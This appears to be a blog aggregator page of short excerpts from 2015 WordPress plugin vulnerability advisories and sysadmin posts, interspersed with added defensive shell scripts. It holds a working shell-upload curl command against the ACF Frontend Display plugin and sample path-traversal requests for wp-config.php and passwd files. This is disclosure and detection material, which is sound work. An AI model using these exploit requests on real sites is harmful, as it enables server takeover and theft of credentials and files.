WordPress Mailcwp 1.99 Shell Upload

14 August 2015 - Source: http://www.mondounix.com
Title: Remote file upload vulnerability in mailcwp v1.99 wordpress plugin
Author: Larry W. Cashdollar, @_larry0
Date: 2015-07-09
Download Site: https://wordpress.org/plugins/mailcwp/
Vendor: CadreWorks Pty Ltd
Vendor Notified: 2015-07-09, fixed in v1.110
Vendor Contact: Contact Page via WP site
Description: MailCWP, Mail Client for WordPress. A full-featured mail client plugin providing webmail access through your WordPress blog or website.
Vulnerability:
The code in mailcwp-upload.php neither checks that the user is authenticated nor checks what type of file is being uploaded; both the message id and the upload directory are taken straight from the request, so an unauthenticated attacker can upload a shell to the target WordPress server:
 
$message_id = $_REQUEST["message_id"];
$upload_dir = $_REQUEST["upload_dir"];
...

Read more »

WordPress WP Attachment Export 0.2.3 Arbitrary File Download

10 August 2015 - Source: http://www.mondounix.com
# Title: Arbitrary File Download in WP Attachment Export Wordpress Plugin v0.2.3
# Submitter: Nitin Venkatesh
# Product: WP Attachment Export Wordpress Plugin
# Product URL: https://wordpress.org/plugins/wp-attachment-export/
# Vulnerability Type: Arbitrary File Download
# Affected Versions: v0.2.3
# Tested versions: v0.2.3
# Fixed Version: v0.2.4
# Link to code diff: https://plugins.trac.wordpress.org/changeset/1170732/
# Changelog: https://wordpress.org/plugins/wp-attachment-export/changelog/
# CVE Status: None/Unassigned/Fresh
 
## Product Information:
 
WP Attachment Export allows you to export your media library into a
WordPress eXtended RSS or WXR file. You can then use the Tools->Import
function in another...

Read more »

A new update is available for Flashtool

1 August 2015 - Source: http://www.androidworld.it


Flashtool, the software for anyone who wants to flash a given Sony firmware onto their device, has just received a new update.

The new build 0.9.19.0 adds support for several Xperia devices, including some with MediaTek chipsets:

  • Z1
  • Z2
  • Z3
  • Z3+
  • Z4 Tablet
  • E4
  • E4g
  • M4.

It is...

Read more »

A nodejs daemon for CentOS 6

28 July 2015 - Source: http://nazarenolatella.myblog.it

As already stated in this post, nodejs has been a real revolution in Web programming, since it allowed a natively client-side language such as JavaScript to be repurposed and used as a server-side language.


The way the application works is fairly simple: you invoke the binary from the CLI and feed it the file...

Read more »

Building a logging facility with logrotate and expect

24 July 2015 - Source: http://nazarenolatella.myblog.it

Scenario

Several Web sites (Apache) with N virtual hosts, each of which uses two dedicated log files (access and error) to record accesses (the first) and the errors generated (the second).

Problem

Given the huge volume of traffic, these log files must be compressed and saved on a weekly basis, moving the resulting archive to a logging facility (in this case a Linux box) over SFTP.

Solution

Integrate...

Read more »
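The scenario above (weekly rotation and compression of per-vhost Apache logs, then a push to a remote box over SFTP) can be wired up as follows. This is an added example and not the article's own script; where the article drives the transfer with expect, this version uses sftp batch mode with key authentication instead, so no password has to be embedded anywhere. The log directory, host name, user, key path and remote directory are hypothetical placeholders.

```shell
#!/bin/sh
# Added example for the logrotate/SFTP scenario; not the article's script.
# It replaces the expect-driven session with sftp batch mode and a key.
# All paths, host names and user names below are hypothetical.

# write_logrotate_conf CONF_FILE LOG_DIR PUSH_SCRIPT
# Weekly rotation, gzip, dated archive names, one Apache reload for the set.
# logrotate compresses a rotated file only after the postrotate script has
# run, so the upload goes in lastaction, which runs once after every log in
# the set has been rotated and compressed.
write_logrotate_conf() {
    conf="$1"      # e.g. /etc/logrotate.d/vhosts
    logdir="$2"    # e.g. /var/log/httpd
    pusher="$3"    # script that calls push_rotated_logs below
    cat > "$conf" <<EOF
$logdir/*-access.log $logdir/*-error.log {
    weekly
    rotate 8
    missingok
    notifempty
    compress
    dateext
    sharedscripts
    postrotate
        /sbin/service httpd reload > /dev/null 2>&1 || true
    endscript
    lastaction
        $pusher $logdir
    endscript
}
EOF
}

# build_sftp_batch LOG_DIR REMOTE_DIR
# Prints the sftp batch script: create (if needed) and enter a dated remote
# directory, upload every archive produced by this rotation (any .gz younger
# than one day), then disconnect. A leading "-" tells sftp to ignore errors
# from that one command, so an existing directory does not abort the batch.
build_sftp_batch() {
    logdir="$1"
    remote_dir="$2"
    printf -- '-mkdir %s\n' "$remote_dir"
    printf 'cd %s\n' "$remote_dir"
    find "$logdir" -maxdepth 1 -name '*.gz' -mtime -1 | sort | sed 's/^/put /'
    printf 'bye\n'
}

# push_rotated_logs LOG_DIR
# sftp -b never prompts, so a failed key login fails fast instead of hanging.
# A non-zero exit here deserves an alert: until the push succeeds the local
# copies are the only ones.
push_rotated_logs() {
    logdir="$1"
    batch=$(mktemp)
    build_sftp_batch "$logdir" "/srv/logs/$(hostname)/$(date +%Y-%m-%d)" > "$batch"
    sftp -b "$batch" -i /root/.ssh/logpush_ed25519 logpush@logbox.example.internal
    rc=$?
    rm -f "$batch"
    return "$rc"
}
```

Run `write_logrotate_conf /etc/logrotate.d/vhosts /var/log/httpd /usr/local/sbin/push-logs` once, and have `/usr/local/sbin/push-logs` source this file and call `push_rotated_logs "$1"`. Restrict the `logpush` account on the receiving box to SFTP only (an `internal-sftp` ForceCommand with a chroot) so the web servers' key cannot open a shell there.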

sniffer.sh: a bash script for spotting site grabbers

20 July 2015 - Source: http://nazarenolatella.myblog.it

Scenario

Suppose your site has become the target of a grabber (whose public IP address is unknown) that forcibly pulls its content every X amount of time.

Suppose, moreover, that the grabber is clever enough to cover its tracks by spoofing the user agent so as to look like a legitimate client.

In the...

Read more »
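Since the grabber in the scenario above spoofs its User-Agent, anything keyed on that header is useless; what it cannot hide is its request pattern. The script below is an added example, not the article's sniffer.sh: it reads a combined-format access log, ignores the User-Agent entirely, and flags any client whose busiest single minute reached a threshold, reporting alongside how many distinct pages that client touched. The log lines it consumes are constructed inside the script.

```shell
#!/bin/sh
# Added example for the site-grabber scenario; not the article's sniffer.sh.
# Detection keys on per-client request rate and breadth, never on the
# (spoofable) User-Agent. Sample log lines below are constructed.

# detect_grabbers LOGFILE THRESHOLD
# Prints, for every client whose busiest minute reached THRESHOLD requests:
#   <ip> <requests in busiest minute> <distinct paths overall>
detect_grabbers() {
    awk -v threshold="$2" '
    {
        ip = $1
        # $4 looks like [20/Jul/2015:10:01:07 ; drop the "[" and the seconds
        minute = substr($4, 2, 17)
        key = ip SUBSEP minute
        per_min[key]++
        if (per_min[key] > peak[ip]) peak[ip] = per_min[key]
        # $7 is the request path; strip any query string before counting
        path = $7
        sub(/\?.*/, "", path)
        if (!((ip SUBSEP path) in seen)) {
            seen[ip SUBSEP path] = 1
            paths[ip]++
        }
    }
    END {
        for (ip in peak)
            if (peak[ip] >= threshold)
                printf "%s %d %d\n", ip, peak[ip], paths[ip]
    }' "$1" | sort
}

# make_sample_log FILE
# Constructed sample: one client pulls 30 distinct posts inside one minute
# behind a browser User-Agent; a human reads two posts over several minutes
# and also fetches the stylesheet, as a real browser would.
make_sample_log() {
    out="$1"
    : > "$out"
    ua='Mozilla/5.0 (Windows NT 6.1; rv:39.0) Gecko/20100101 Firefox/39.0'
    i=1
    while [ "$i" -le 30 ]; do
        printf '192.0.2.44 - - [20/Jul/2015:10:01:%02d +0200] "GET /post-%d/ HTTP/1.1" 200 5120 "-" "%s"\n' \
            "$i" "$i" "$ua" >> "$out"
        i=$((i + 1))
    done
    printf '203.0.113.9 - - [20/Jul/2015:10:03:11 +0200] "GET /post-1/ HTTP/1.1" 200 5120 "-" "%s"\n' "$ua" >> "$out"
    printf '203.0.113.9 - - [20/Jul/2015:10:03:12 +0200] "GET /wp-content/themes/t/style.css HTTP/1.1" 200 880 "http://example.test/post-1/" "%s"\n' "$ua" >> "$out"
    printf '203.0.113.9 - - [20/Jul/2015:10:09:40 +0200] "GET /post-2/ HTTP/1.1" 200 4980 "http://example.test/post-1/" "%s"\n' "$ua" >> "$out"
}

if [ "${1:-}" = "--demo" ]; then
    tmp=$(mktemp)
    make_sample_log "$tmp"
    detect_grabbers "$tmp" 20     # prints: 192.0.2.44 30 30
    rm -f "$tmp"
fi
```

A grabber that throttles itself will stay under a per-minute threshold; the distinct-path count in the last column still separates it from a reader, and a client that fetches page after page without ever requesting a stylesheet, script or image is another tell worth adding before turning the output into a firewall rule.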

WordPress Image Export 1.1 Arbitrary File Download

16 July 2015 - Source: http://www.mondounix.com
Title: Remote file download vulnerability in Wordpress Plugin image-export v1.1
Author: Larry W. Cashdollar, @_larry0
Date: 2015-07-01
Download Site: https://wordpress.org/plugins/image-export
Vendor: www.1efthander.com
Vendor Notified: 2015-07-05
Vendor Contact: https://twitter.com/1eftHander
Description: The Image Export plugin lets you selectively download images uploaded by an administrator.
Vulnerability:
The code in download.php does not verify that the requested path lies inside the uploaded-images directory, so any file the web server can read can be downloaded. Line 8 then unlinks the file after it has been sent, so the script can also be used to delete files from the WordPress installation wherever file permissions allow.
 
      1 <?php
     ...

Read more »

WordPress WP-SwimTeam 1.44.10777 Arbitrary File Download

13 July 2015 - Source: http://www.mondounix.com
Title: Remote file download vulnerability in Wordpress Plugin wp-swimteam v1.44.10777
Author: Larry W. Cashdollar, @_larry0
Date: 2015-07-02
Download Site: https://wordpress.org/plugins/wp-swimteam
Vendor: Mike Walsh www.MichaelWalsh.org
Vendor Notified: 2015-07-02, fixed in v1.45beta3
Vendor Contact: Through website
Advisory: http://www.vapid.dhs.org/advisory.php?v=134
Description: Swim Team (aka wp-SwimTeam) is a comprehensive WordPress plugin to run a swim team including registration, volunteer assignments, scheduling, and much more.
Vulnerability:
The code in ./wp-swimteam/include/user/download.php does not sanitize the user-supplied file path, allowing sensitive system files to be downloaded:
 
 
$file = urldecode($args['file'])...

Read more »

WordPress WP-Ecommerce-Shop-Styling 2.5 File Download

13 July 2015 - Source: http://www.mondounix.com
Title: Remote file download vulnerability in wordpress plugin wp-ecommerce-shop-styling v2.5
Author: Larry W. Cashdollar, @_larry0
Date: 2015-07-05
Download Site: https://wordpress.org/plugins/wp-ecommerce-shop-styling
Vendor: https://profiles.wordpress.org/haet/
Vendor Notified: 2015-07-05, fixed in version 2.6.
Vendor Contact: http://wpshopstyling.com
Description: Customize your WP ecommerce store with HTML mail templates, message content, transaction results and PDF invoices with WYSIWYG editor and placeholders.
Vulnerability:
The code in ./wp-ecommerce-shop-styling/includes/download.php does not sanitize the user-supplied file path, so sensitive system files can be downloaded.
 
 
<?php
require_once("../../../../wp-admin/admin.php");
...

Read more »
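The three download.php advisories above (image-export, wp-swimteam and wp-ecommerce-shop-styling) share one bug class: a file parameter that is never confined to the intended directory. Whether any of them was actually hit shows up in the access log, and the scan below is an added example for hunting that, not code from any of the plugins or advisories. It decodes each request to a download.php endpoint twice before testing it: if the parameter comes from the query string, PHP has already percent-decoded it once, so a handler that calls urldecode() on it again, as the wp-swimteam snippet does, also accepts a double-encoded `%252e%252e%2f` that a single-decode filter would never see (that `$args` is populated from the request is an assumption here). The log lines and the `file=` parameter name are constructed.

```shell
#!/bin/sh
# Added example for the download.php advisories; not plugin or advisory code.
# Hunts an access log for download requests whose path escapes its directory.
# Sample log lines and the query parameter name are constructed.

# scan_download_traversal LOGFILE
# Prints "<ip> <status> <twice-decoded request>" for each request to a
# download.php whose query, after one or two rounds of percent-decoding,
# contains a ../ or ..\ step, a parameter starting with "/", or a NUL byte.
scan_download_traversal() {
    awk '
    function urldecode(s,    out, c, h, hex) {
        hex = "0123456789ABCDEF"
        out = ""
        while (length(s) > 0) {
            c = substr(s, 1, 1)
            if (c == "%" && substr(s, 2, 2) ~ /^[0-9A-Fa-f][0-9A-Fa-f]$/) {
                h = toupper(substr(s, 2, 2))
                if (h == "00")
                    out = out "%00"   # keep a NUL visible instead of emitting it
                else
                    out = out sprintf("%c", (index(hex, substr(h, 1, 1)) - 1) * 16 + index(hex, substr(h, 2, 1)) - 1)
                s = substr(s, 4)
            } else {
                out = out c
                s = substr(s, 2)
            }
        }
        return out
    }
    function suspicious(p) {
        # "../" or "..\" anywhere, or a parameter value that starts with a slash
        return p ~ /\.\.[\/\\]/ || p ~ /=[\/\\]/
    }
    # combined log: $1 client, $7 request path, $9 status
    index($7, "download.php?") > 0 {
        once  = urldecode($7)
        twice = urldecode(once)
        if (index($7, "%00") > 0 || suspicious(once) || suspicious(twice))
            print $1, $9, twice
    }' "$1"
}

# sample_download_log FILE
# Constructed sample: two traversal attempts from one client (the second one
# double-encoded), one legitimate download, one unrelated request.
sample_download_log() {
    cat > "$1" <<'EOF'
198.51.100.23 - - [13/Jul/2015:10:01:02 +0200] "GET /wp-content/plugins/image-export/download.php?file=../../../../wp-config.php HTTP/1.1" 200 3120 "-" "Mozilla/5.0"
203.0.113.9 - - [13/Jul/2015:10:01:30 +0200] "GET /wp-content/plugins/image-export/download.php?file=photo-2015.jpg HTTP/1.1" 200 48211 "-" "Mozilla/5.0"
198.51.100.23 - - [13/Jul/2015:10:02:15 +0200] "GET /wp-content/plugins/wp-swimteam/include/user/download.php?file=%252e%252e%2f%252e%252e%2fetc%2fpasswd HTTP/1.1" 200 1830 "-" "curl/7.43.0"
203.0.113.9 - - [13/Jul/2015:10:03:00 +0200] "GET /index.php HTTP/1.1" 200 9120 "-" "Mozilla/5.0"
EOF
}

if [ "${1:-}" = "--demo" ]; then
    tmp=$(mktemp)
    sample_download_log "$tmp"
    scan_download_traversal "$tmp"
    rm -f "$tmp"
fi
```

A 200 on a flagged line means the file left the server; a wp-config.php hit means the database credentials and salts need rotating, and for image-export the same request also deleted the file, so check whether the path still exists on disk.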

WordPress ACF Frontend Display Shell Upload

13 July 2015 - Source: http://www.mondounix.com
+---------------------------------------------------------------------------+
#[+] Author: TUNISIAN CYBER
#[+] Title: WP Plugin Free ACF Frontend Display File Upload Vulnerability
#[+] Date: 3-07-2015
#[+] Type: WebAPP
#[+] Tested on: KaliLinux
#[+] Friendly Sites: sec4ever.com
#[+] Twitter: @TCYB3R
+---------------------------------------------------------------------------+
 
curl -k -X POST -F "action=upload" -F "files=@/root/Desktop/evil.php" "site:wp-content/plugins/acf-frontend-display/js/blueimp-jQuery-File-Upload-d45deb1/server/php/index.php"
 
File Path:
site/wp-content/uploads/uigen_YEAR/file.php
 
Example:
site/wp-content/uploads/uigen_2015/evil.php
 
evil.php:...

Read more »